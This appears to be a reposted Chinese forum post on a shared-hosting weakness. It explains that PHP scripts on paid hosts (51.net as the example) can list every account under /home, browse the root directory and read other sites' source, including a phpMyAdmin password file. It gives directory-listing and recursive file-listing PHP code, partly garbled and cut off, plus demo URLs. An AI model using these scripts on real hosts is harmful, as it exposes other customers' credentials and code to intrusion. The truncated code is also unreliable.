编者:其实我从别的网站上看到这个文章的时候,不是现在这个名字, 叫一点经验.
不好意思,作者,其实我是为了引起更多朋友对这篇文章的关注.
可惜不知道作者是谁......
大多数(能执行PHP的)收费空间都有此问题
以下以虎翼为例:
代码:
handle."
\n";
echo "Path:".$d->path."
\n";
while($entry=$d->read())
{
echo $entry."
\n";
}
$d->close();
?>
利用此test.php程序可以查看/home下所有文件,可以查看51.net的当前主机的全部用户
把"/home"改成"/"可以看到什么?你自己去看吧.别太紧张.紧张的在后面
HOME下的全是登陆帐号
HOME/.domain和
HOME/.trialdomain
下的全是三级域名
帐号里有很多都没空间,是空号。我反复试了。
三级域名是对应·A型虚拟主机的
例子(没敢用虎翼的)
http://tonylong.l1h.net/test.php
http://tonylong.l1h.net/test1.php
http://tonylong.l1h.net/test2.php
http://tonylong.l1h.net/test3.php
用aa.php读取文件原码
读取。。
例子读取:/home/html/phpmyadmin/user_password.php的原码(这对网站威胁很大)http://tonylong.l1h.net/aa.php
用ss.php查询指定文件目录下的所有文件和文件夹
";
$handle=opendir($dir);
echo "directory Handle:$handle
\n";
while ($sdir=readdir($handle)){
if(is_file("$dir/$sdir"))
echo "$dir/$sdir";
if(is_dir("$dir/$sdir") and $sdir<>'.' and $sdir<>'..'){
echo "$dir";
listdir("$dir/$sdir");
}
}
closedir($handle);
echo "";
}
if(!empty($dir)){
listdir($dir);
}
?>
例子http://tonylong.l1h.net/ss.php
以上演示空间是l1h.net的免费空间
大家别攻击
|
